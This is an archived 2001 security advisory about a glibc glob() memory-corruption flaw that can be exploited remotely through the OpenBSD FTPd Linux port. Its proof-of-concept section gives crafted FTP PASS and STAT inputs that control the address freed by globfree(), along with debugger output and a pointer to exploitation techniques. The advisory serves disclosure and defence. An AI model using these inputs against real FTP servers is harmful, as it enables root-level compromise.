[UNIX] Glibc Globing Issues (~AAA{ Trick)

From: support@securiteam.com
Date: 12/23/01


From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 23 Dec 2001 05:04:08 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Glibc Globing Issues (~AAA{ Trick)
------------------------------------------------------------------------

SUMMARY

Glibc contains a globing error that may be remotely exploitable when glob
functions are used in software such as ftp daemons.

DETAILS

The glibc glob() function allows programs to search for path names
matching specific patterns according the rules used by the shell. Glibc
also implements the globfree() function which free()'s memory used earlier
by other glob() matches. The glob function itself may encounter errors
when handling strings ending with the "{"(0x7b)character. This is due to
next_brace_sub() which could cause glob to read memory pages it should not
be, eventually causing the program to exit (Normally with SEGV)..

Note: The vulnerability described in CA-2001-33 with Washington
Universities FTPd was not due to errors in glibc glob - but their own
implementation of this function.

Previous discussions ruled this bug as not exploitable. This is not
entirely true. Global Intersec has since discovered a condition under
which the bug may be used to exploit this vulnerability.

This is dependant on the program in question using the globfree()
function, also defined in glibc glob.c (sysdeps/generic/glob.c). An
example of this would be the OpenBSD FTPd Linux port. By carefully
constructing user input to such daemons, it is possible to corrupt memory
space of the process. Ultimately, the result of this would be an ability
to execute arbitrary commands with the privileges of the server process.
This is often root(0).

Impact:
For this bug to be exploitable the attacker must be able to cause a daemon
to call glob matching functions via services which allow either
anonymous/public access or which may require authentication. This includes
ftp daemons.

Workaround:
The scope for your systems being targeted to this form of attack can be
reduced by disabling remotely accessible daemons that use the functions in
question. These include the OpenBSD FTPd Linux port. It is also suggested
that removal of any public access to such daemons is removed until vendor
fixes have been applied.

Proof of concept:
For the purposes of proving a concept, we will now refer to use of these
functions in the OpenBSD ftp daemon - ported to Linux by David Madore.

As we have recently seen in the Washington University ftp daemon, free()
based vulnerabilities are readily exploitable. In the case of the OpenBSD
ftpd we must ensure that globfree() is called to make any use of the glob
vulnerabilities.

Note: OpenBSD itself is not vulnerable to this form of attack due to the
way in which it handles memory pages.

By forcing globfree() to be called _before_ the next_brace_sub condition
occurs it is possible to control the address which is free()'d. In our
first example, we insert an invalid address onto the stack, causing the
program to SEGV.

 : 220 localhost FTP server (Version 6.5/OpenBSD, Linux port 0.3.3) ready.
 -> USER ftp
 : 331 Guest login ok, type your name as password.
 Sleeping for 10 seconds...
 -> PASS AAAAAAAAAAAAAAAAAAA\xef\xef\xbe\xad\xde # ( <19 Bytes> <Addr to
write> <Glob char>)
 : 230 Guest login ok, access restrictions apply.
 -> STAT ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{

 #0 0x400f7968 in globfree () at ../sysdeps/generic/glob.c:1055
 #1 0x8051b0b in yyparse () at ftpcmd.y:1138
 # 2 0x804b455 in main (argc=3D1094795585, argv=3D0xbffff864,
envp=3D0xbffff86c) at ftpd.c:715

Examination of the registers shows that we have successfully inserted the
intended address. As the address is not valid the FTP daemon segment
faults.

   <snip>
   esi 0xdeadbeef -559038737
   edi 0xdeadbeef -559038737
   </snip>

On giving the ftp daemon a valid address to free (In this case a pointer
to syslog()) the daemon will continue to free() the address we gave it #
where it again will segfault due to the address we gave it not being a
valid malloc chunk.

 #0 0x400c6178 in free () at malloc.c:2952
 #1 0x400f7989 in globfree () at ../sysdeps/generic/glob.c:1055
 #2 0x8051b0b in yyparse () at ftpcmd.y:1138
 #3 0x804b455 in main (argc=3D1094795585, argv=3D0xbffff864,
envp=3D0xbffff86c) at ftpd.c:715

i.e. (SuSE glibc-2.2/sysdeps/generic/glob.c):
   glob.c:1097 if (pglob->gl_pathv[pglob->gl_offs + i] != NULL)
   glob.c:1098 free ((__ptr_t) pglob->gl_pathv[pglob->gl_offs + i]);
   glob.c:1099 free ((__ptr_t) pglob->gl_pathv);

Information on exploiting this form of vulnerability is available at
<http://www.phrack.org/show.php?p=57&a=9>
http://www.phrack.org/show.php?p=57&a=9

ADDITIONAL INFORMATION

The information has been provided by <mailto:tom@rooted.net> Tom Parker.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages